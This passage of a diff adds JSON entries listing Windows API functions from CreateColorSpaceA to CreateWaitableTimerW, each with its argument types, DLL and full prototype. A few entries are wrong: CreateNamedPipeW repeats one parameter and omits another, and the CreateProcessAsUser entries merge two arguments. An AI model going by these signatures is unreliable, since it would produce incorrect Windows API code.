+ ], + "dll_name": "gdi32.dll", + "full_prototype": "HCOLORSPACE CreateColorSpaceA(LPLOGCOLORSPACE lpLogColorSpace);" + }, + { + "function_name": "CreateColorSpaceW", + "arguments": [ + "LPLOGCOLORSPACEW" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HCOLORSPACE CreateColorSpaceW(LPLOGCOLORSPACEW lpLogColorSpace);" + }, + { + "function_name": "CreateCompatibleBitmap", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBITMAP CreateCompatibleBitmap(HDC hdc, int nWidth,int nHeight);" + }, + { + "function_name": "CreateCompatibleDC", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateCompatibleDC(HDC hdc);" + }, + { + "function_name": "CreateConsoleScreenBuffer", + "arguments": [ + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES", + "DWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateConsoleScreenBuffer( DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES *lpSecurityAttributes, DWORD dwFlags, LPVOID lpScreenBufferData );" + }, + { + "function_name": "CreateCursor", + "arguments": [ + "HINSTANCE", + "int", + "int", + "int", + "int", + "CONST VOID", + "CONST VOID" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR CreateCursor(HINSTANCE hInst, int xHotSpot, int yHotSpot, int nWidth, int nHeight, CONST VOID *pvANDPlane, CONST VOID *pvXORPlane );" + }, + { + "function_name": "CreateDCA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR", + "CONST DEVMODE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateDCA( LPCTSTR lpszDriver, LPCTSTR lpszDevice, LPCTSTR lpszOutput, CONST DEVMODE *lpInitData );" + }, + { + "function_name": "CreateDCW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "const DEVMODEW *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateDCW(LPCWSTR lpszDriver, LPCWSTR lpszDevice,LPCWSTR lpszOutput,const DEVMODEW * lpInitData);" + }, + { + "function_name": "CreateDesktopA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPDEVMODE", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "user32.dll", + "full_prototype": "HDESK CreateDesktopA(LPCTSTR lpszDesktop, LPCTSTR lpszDevice, LPDEVMODE pDevMode, DWORD dwFlags, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpsa);" + }, + { + "function_name": "CreateDesktopW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPDEVMODEW", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "user32.dll", + "full_prototype": "HDESK CreateDesktopW(LPCWSTR lpszDesktop, LPCWSTR lpszDevice, LPDEVMODEW pDevMode, DWORD dwFlags, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpsa);" + }, + { + "function_name": "CreateDialogIndirectParamA", + "arguments": [ + "HINSTANCE", + "LPCDLGTEMPLATE", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateDialogIndirectParamA(HINSTANCE hInstance, LPCDLGTEMPLATE lpTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM lParamInit);" + }, + { + "function_name": "CreateDialogIndirectParamW", + "arguments": [ + "HINSTANCE", + "LPCDLGTEMPLATE", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateDialogIndirectParamW(HINSTANCE hInstance, LPCDLGTEMPLATE lpTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM lParamInit);" + }, + { + "function_name": "CreateDialogParamA", + "arguments": [ + "HINSTANCE", + "LPCTSTR", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateDialogParamA(HINSTANCE hInstance, LPCTSTR lpTemplateName, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);" + }, + { + "function_name": "CreateDialogParamW", + "arguments": [ + "HINSTANCE", + "LPCWSTR", + "HWND", + "DLGPROC", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateDialogParamW(HINSTANCE hInstance, LPCWSTR lpTemplateName, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);" + }, + { + "function_name": "CreateDIBPatternBrush", + "arguments": [ + "HGLOBAL", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBRUSH CreateDIBPatternBrush(HGLOBAL hglbDIBPacked, UINT fuColorSpec);" + }, + { + "function_name": "CreateDIBPatternBrushPt", + "arguments": [ + "CONST VOID *", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBRUSH CreateDIBPatternBrushPt(CONST VOID * lpPackedDIB, UINT iUsage);" + }, + { + "function_name": "CreateDIBSection", + "arguments": [ + "HDC", + "CONST BITMAPINFO", + "UINT", + "VOID", + "HANDLE", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBITMAP CreateDIBSection(HDC hdc, CONST BITMAPINFO *pbmi, UINT iUsage, VOID **ppvBits, HANDLE hSection, DWORD dwOffset);" + }, + { + "function_name": "CreateDIBitmap", + "arguments": [ + "HDC", + "CONST BITMAPINFOHEADER *", + "DWORD", + "CONST VOID", + "CONST BITMAPINFO *", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBITMAP CreateDIBitmap(HDC hdc, CONST BITMAPINFOHEADER * lpbmih, DWORD fdwInit, CONST VOID *lpbInit, CONST BITMAPINFO * lpbmi, UINT fuUsage);" + }, + { + "function_name": "CreateDirectoryA", + "arguments": [ + "LPCTSTR", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateDirectoryA( LPCTSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);" + }, + { + "function_name": "CreateDirectoryW", + "arguments": [ + "LPCWSTR", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateDirectoryW(LPCWSTR lpPathName,LPSECURITY_ATTRIBUTES lpSecurityAttributes);" + }, + { + "function_name": "CreateDirectoryExA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateDirectoryExA( LPCTSTR lpTemplateDirectory, LPCTSTR lpNewDirectory, LPSECURITY_ATTRIBUTES lpSecurityAttributes );" + }, + { + "function_name": "CreateDirectoryExW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateDirectoryExW( LPCWSTR lpTemplateDirectory, LPCWSTR lpNewDirectory, LPSECURITY_ATTRIBUTES lpSecurityAttributes );" + }, + { + "function_name": "CreateDirectoryTransactedA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPSECURITY_ATTRIBUTES", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateDirectoryTransactedA( LPCTSTR lpTemplateDirectory, LPCTSTR lpNewDirectory, LPSECURITY_ATTRIBUTES lpSecurityAttributes, HANDLE hTransaction);" + }, + { + "function_name": "CreateDirectoryTransactedW", + "arguments": [ + "LPCTWSTR", + "LPCTWSTR", + "LPSECURITY_ATTRIBUTES", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateDirectoryTransactedW( LPCTWSTR lpTemplateDirectory, LPCTWSTR lpNewDirectory, LPSECURITY_ATTRIBUTES lpSecurityAttributes, HANDLE hTransaction);" + }, + { + "function_name": "CreateDiscardableBitmap", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBITMAP CreateDiscardableBitmap(HDC hdc, int nWidth, int nHeight);" + }, + { + "function_name": "CreateEllipticRgn", + "arguments": [ + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreateEllipticRgn(int nLeftRect, int nTopRect,int nRightRect,int nBottomRect);" + }, + { + "function_name": "CreateEllipticRgnIndirect", + "arguments": [ + "CONST RECT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreateEllipticRgnIndirect(CONST RECT *lprc);" + }, + { + "function_name": "CreateEnhMetaFileA", + "arguments": [ + "HDC", + "LPCTSTR", + "CONST RECT *", + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateEnhMetaFileA(HDC hdcRef, LPCTSTR lpFilename, CONST RECT * lpRect,LPCTSTR lpDescription);" + }, + { + "function_name": "CreateEnhMetaFileW", + "arguments": [ + "HDC", + "LPCWSTR", + "const RECT", + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateEnhMetaFileW(HDC hdcRef, LPCWSTR lpFilename, const RECT *lpRect, LPCWSTR lpDescription);" + }, + { + "function_name": "CreateEventA", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "BOOL", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateEventA( LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCTSTR lpName );" + }, + { + "function_name": "CreateEventW", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "BOOL", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateEventW(LPSECURITY_ATTRIBUTES lpEventAttributes,BOOL bManualReset,BOOL bInitialState,LPCWSTR lpName );" + }, + { + "function_name": "CreateFiber", + "arguments": [ + "SIZE_T", + "LPFIBER_START_ROUTINE", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID CreateFiber(SIZE_T dwStackSize,LPFIBER_START_ROUTINE lpStartAddress,LPVOID lpParameter);" + }, + { + "function_name": "CreateFileA", + "arguments": [ + "LPCTSTR", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES", + "DWORD", + "DWORD", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateFileA( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDistribution, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );" + }, + { + "function_name": "CreateFileW", + "arguments": [ + "LPCWSTR", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES", + "DWORD", + "DWORD", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateFileW( LPCWSTR filename, DWORD access, DWORD sharing, LPSECURITY_ATTRIBUTES sa, DWORD creation, DWORD attributes, HANDLE template );" + }, + { + "function_name": "CreateFileMappingA", + "arguments": [ + "HANDLE", + "LPSECURITY_ATTRIBUTES", + "DWORD", + "DWORD", + "DWORD", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCTSTR lpName );" + }, + { + "function_name": "CreateFileMappingW", + "arguments": [ + "HANDLE", + "LPSECURITY_ATTRIBUTES", + "DWORD", + "DWORD", + "DWORD", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateFileMappingW( HANDLE hFile, LPSECURITY_ATTRIBUTES sa, DWORD protect, DWORD size_high, DWORD size_low, LPCWSTR name );" + }, + { + "function_name": "CreateFontA", + "arguments": [ + "int", + "int", + "int", + "int", + "int", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HFONT CreateFontA( int nHeight, int nWidth, int nEscapement, int nOrientation, int fnWeight, DWORD fdwItalic, DWORD fdwUnderline, DWORD fdwStrikeOut, DWORD fdwCharSet, DWORD fdwOutputPrecision, DWORD fdwClipPrecision, DWORD fdwQuality, DWORD fdwPitchAndFamily, LPCTSTR lpszFace );" + }, + { + "function_name": "CreateFontIndirectA", + "arguments": [ + "CONST LOGFONT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HFONT CreateFontIndirectA(CONST LOGFONT *lplf);" + }, + { + "function_name": "CreateFontIndirectW", + "arguments": [ + "CONST LOGFONTW" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HFONT CreateFontIndirectW(CONST LOGFONTW *lplf);" + }, + { + "function_name": "CreateFontW", + "arguments": [ + "int", + "int", + "int", + "int", + "int", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HFONT CreateFontW( int nHeight, int nWidth, int nEscapement, int nOrientation, int fnWeight, DWORD fdwItalic, DWORD fdwUnderline, DWORD fdwStrikeOut, DWORD fdwCharSet, DWORD fdwOutputPrecision, DWORD fdwClipPrecision, DWORD fdwQuality, DWORD fdwPitchAndFamily, LPCWSTR lpszFace );" + }, + { + "function_name": "CreateHalftonePalette", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HPALETTE CreateHalftonePalette(HDC hdc);" + }, + { + "function_name": "CreateHatchBrush", + "arguments": [ + "int", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBRUSH CreateHatchBrush(int fnStyle, COLORREF clrref);" + }, + { + "function_name": "CreateICA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR", + "CONST DEVMODE *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateICA( LPCTSTR lpszDriver, LPCTSTR lpszDevice, LPCTSTR lpszOutput, CONST DEVMODE * lpdvmInit );" + }, + { + "function_name": "CreateICW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "CONST DEVMODEW *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateICW(LPCWSTR lpszDriver, LPCWSTR lpszDevice, LPCWSTR lpszOutput, CONST DEVMODEW * lpdvmInit);" + }, + { + "function_name": "CreateIcon", + "arguments": [ + "HINSTANCE", + "int", + "int", + "BYTE", + "BYTE", + "CONST BYTE", + "CONST BYTE" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON CreateIcon( HINSTANCE hInstance, int nWidth, int nHeight, BYTE cPlanes, BYTE cBitsPixel, CONST BYTE *lpbANDbits, CONST BYTE *lpbXORbits );" + }, + { + "function_name": "CreateIconFromResource", + "arguments": [ + "PBYTE", + "DWORD", + "BOOL", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON CreateIconFromResource(PBYTE presbits, DWORD dwResSize, BOOL fIcon, DWORD dwVer);" + }, + { + "function_name": "CreateIconFromResourceEx", + "arguments": [ + "PBYTE", + "DWORD", + "BOOL", + "DWORD", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON CreateIconFromResourceEx(PBYTE pbIconBits, DWORD cbIconBits,BOOL fIcon, DWORD dwVersion, int cxDesired, int cyDesired, UINT uFlags);" + }, + { + "function_name": "CreateIconIndirect", + "arguments": [ + "PICONINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "HICON CreateIconIndirect(PICONINFO piconinfo);" + }, + { + "function_name": "CreateMailslotA", + "arguments": [ + "LPCTSTR", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateMailslotA( LPCTSTR lpName, DWORD nMaxMessageSize, DWORD lReadTimeout, LPSECURITY_ATTRIBUTES lpSecurityAttributes );" + }, + { + "function_name": "CreateMailslotW", + "arguments": [ + "LPCWSTR", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateMailslotW( LPCWSTR lpName, DWORD nMaxMessageSize, DWORD lReadTimeout, LPSECURITY_ATTRIBUTES sa );" + }, + { + "function_name": "CreateMDIWindowA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "DWORD", + "int", + "int", + "int", + "int", + "HWND", + "HINSTANCE", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateMDIWindowA(LPTSTR lpClassName, LPTSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HINSTANCE hInstance, LPARAM lParam);" + }, + { + "function_name": "CreateMDIWindowW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "DWORD", + "int", + "int", + "int", + "int", + "HWND", + "HINSTANCE", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND CreateMDIWindowW(LPCWSTR lpClassName, LPCWSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HINSTANCE hInstance, LPARAM lParam);" + }, + { + "function_name": "CreateMenu", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU CreateMenu(VOID);" + }, + { + "function_name": "CreateMetaFileA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateMetaFileA(LPCTSTR lpszFile);" + }, + { + "function_name": "CreateMetaFileW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC CreateMetaFileW(LPCWSTR filename);" + }, + { + "function_name": "CreateMutexA", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "BOOL", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateMutexA( LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCTSTR lpName );" + }, + { + "function_name": "CreateMutexW", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateMutexW(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCWSTR lpName );" + }, + { + "function_name": "CreateNamedPipeA", + "arguments": [ + "LPCTSTR", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateNamedPipeA( LPCTSTR lpName, DWORD dwOpenMode, DWORD dwPipeMode, DWORD nMaxInstances, DWORD nOutBufferSize, DWORD nInBufferSize, DWORD nDefaultTimeOut, LPSECURITY_ATTRIBUTES lpSecurityAttributes );" + }, + { + "function_name": "CreateNamedPipeW", + "arguments": [ + "LPCWSTR", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateNamedPipeW(LPCWSTR lpName,DWORD dwOpenMode,DWORD nMaxInstances,DWORD nOutBufferSize,DWORD nInBufferSize,DWORD nDefaultTimeOut,DWORD nDefaultTimeOut,LPSECURITY_ATTRIBUTES lpSecurityAttributes );" + }, + { + "function_name": "CreatePalette", + "arguments": [ + "CONST LOGPALETTE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HPALETTE CreatePalette(CONST LOGPALETTE *lplgpl);" + }, + { + "function_name": "CreatePatternBrush", + "arguments": [ + "HBITMAP" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBRUSH CreatePatternBrush(HBITMAP hbmp);" + }, + { + "function_name": "CreatePen", + "arguments": [ + "int", + "int", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HPEN CreatePen(int fnPenStyle,int nWidth, COLORREF crColor);" + }, + { + "function_name": "CreatePenIndirect", + "arguments": [ + "CONST LOGPEN *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HPEN CreatePenIndirect(CONST LOGPEN * lplgpn);" + }, + { + "function_name": "CreatePipe", + "arguments": [ + "PHANDLE", + "PHANDLE", + "LPSECURITY_ATTRIBUTES", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreatePipe( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize );" + }, + { + "function_name": "CreatePolyPolygonRgn", + "arguments": [ + "CONST POINT", + "CONST INT", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreatePolyPolygonRgn(CONST POINT *lppt, CONST INT *lpPolyCounts,int nCount,int fnPolyFillMode);" + }, + { + "function_name": "CreatePolygonRgn", + "arguments": [ + "CONST POINT", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreatePolygonRgn(CONST POINT *lppt, int cPoints, int fnPolyFillMode);" + }, + { + "function_name": "CreatePopupMenu", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU CreatePopupMenu(VOID)" + }, + { + "function_name": "CreatePrivateObjectSecurity", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSECURITY_DESCRIPTOR", + "PSECURITY_DESCRIPTOR *", + "BOOL", + "HANDLE", + "PGENERIC_MAPPING" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL CreatePrivateObjectSecurity( PSECURITY_DESCRIPTOR ParentDescriptor, PSECURITY_DESCRIPTOR CreatorDescriptor, PSECURITY_DESCRIPTOR * NewDescriptor, BOOL IsDirectoryObject, HANDLE Token, PGENERIC_MAPPING GenericMapping );" + }, + { + "function_name": "CreateProcessA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "LPSECURITY_ATTRIBUTES", + "LPSECURITY_ATTRIBUTES", + "BOOL", + "DWORD", + "LPVOID", + "LPCTSTR", + "LPSTARTUPINFO", + "LPPROCESS_INFORMATION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateProcessA( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );" + }, + { + "function_name": "CreateProcessW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "LPSECURITY_ATTRIBUTES", + "LPSECURITY_ATTRIBUTES", + "BOOL", + "DWORD", + "PVOID", + "LPCWSTR", + "LPSTARTUPINFOW", + "LPPROCESS_INFORMATION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL CreateProcessW(LPCWSTR lpApplicationName,LPWSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,PVOID lpEnvironment,LPCWSTR lpCurrentDirectory,LPSTARTUPINFOW lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation);" + }, + { + "function_name": "CreateProcessAsUserA", + "arguments": [ + "HANDLE hToken LPCTSTR", + "LPTSTR", + "LPSECURITY_ATTRIBUTES", + "LPSECURITY_ATTRIBUTES", + "BOOL", + "DWORD", + "LPVOID", + "LPCTSTR", + "LPSTARTUPINFO", + "LPPROCESS_INFORMATION" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL CreateProcessAsUserA( HANDLE hToken LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );" + }, + { + "function_name": "CreateProcessAsUserW", + "arguments": [ + "HANDLE hToken LPCWSTR", + "LPWSTR", + "LPSECURITY_ATTRIBUTES", + "LPSECURITY_ATTRIBUTES", + "BOOL", + "DWORD", + "LPVOID", + "LPWSTR", + "LPSTARTUPINFO", + "LPPROCESS_INFORMATION" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL CreateProcessAsUserW( HANDLE hToken LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );" + }, + { + "function_name": "CreateRectRgn", + "arguments": [ + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreateRectRgn(int nLeftRect,int nTopRect, int nRightRect, int nBottomRect);" + }, + { + "function_name": "CreateRectRgnIndirect", + "arguments": [ + "CONST RECT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreateRectRgnIndirect(CONST RECT *lprc);" + }, + { + "function_name": "CreateRemoteThread", + "arguments": [ + "HANDLE", + "LPSECURITY_ATTRIBUTES", + "DWORD", + "LPTHREAD_START_ROUTINE", + "LPVOID", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );" + }, + { + "function_name": "CreateRoundRectRgn", + "arguments": [ + "int", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HRGN CreateRoundRectRgn(int nLeftRect, int nTopRect, int nRightRect,int nBottomRect, int nWidthEllipse,int nHeightEllipse);" + }, + { + "function_name": "CreateScalableFontResourceA", + "arguments": [ + "DWORD", + "LPCTSTR", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL CreateScalableFontResourceA(DWORD fdwHidden, LPCTSTR lpszFontRes, LPCTSTR lpszFontFile,LPCTSTR lpszCurrentPath);" + }, + { + "function_name": "CreateScalableFontResourceW", + "arguments": [ + "DWORD", + "LPCWSTR", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL CreateScalableFontResourceW(DWORD fdwHidden, LPCWSTR lpszFontRes, LPCWSTR lpszFontFile,LPCWSTR lpszCurrentPath);" + }, + { + "function_name": "CreateSemaphoreA", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "LONG", + "LONG", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateSemaphoreA( LPSECURITY_ATTRIBUTES lpSemaphoreAttributes, LONG lInitialCount, LONG lMaximumCount, LPCTSTR lpName );" + }, + { + "function_name": "CreateSemaphoreW", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "LONG", + "LONG", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateSemaphoreW(LPSECURITY_ATTRIBUTES lpSemaphoreAttributes,LONG lInitialCount,LONG lMaximumCount,LPCWSTR lpName);" + }, + { + "function_name": "CreateSolidBrush", + "arguments": [ + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HBRUSH CreateSolidBrush(COLORREF crColor);" + }, + { + "function_name": "CreateStatusWindowA", + "arguments": [ + "LONG", + "LPCTSTR", + "HWND", + "UINT" + ], + "dll_name": "comctl32.dll", + "full_prototype": "HWND CreateStatusWindowA( LONG style, LPCTSTR lpszText, HWND hwndParent, UINT wID );" + }, + { + "function_name": "CreateTapePartition", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD CreateTapePartition( HANDLE hDevice, DWORD dwPartitionMethod, DWORD dwCount, DWORD dwSize );" + }, + { + "function_name": "CreateToolhelp32Snapshot", + "arguments": [ + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID);" + }, + { + "function_name": "CreateThread", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "DWORD", + "LPTHREAD_START_ROUTINE", + "LPVOID", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateThread( LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );" + }, + { + "function_name": "CreateWaitableTimerA", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "BOOL", + "LPCSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateWaitableTimerA( LPSECURITY_ATTRIBUTES lpTimerAttributes, BOOL bManualReset, LPCSTR lpTimerName );" + }, + { + "function_name": "CreateWaitableTimerW", + "arguments": [ + "LPSECURITY_ATTRIBUTES", + "BOOL", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE CreateWaitableTimerW( LPSECURITY_ATTRIBUTES lpTimerAttributes, BOOL bManualReset, LPCWSTR lpTimerName );" + }, + { + 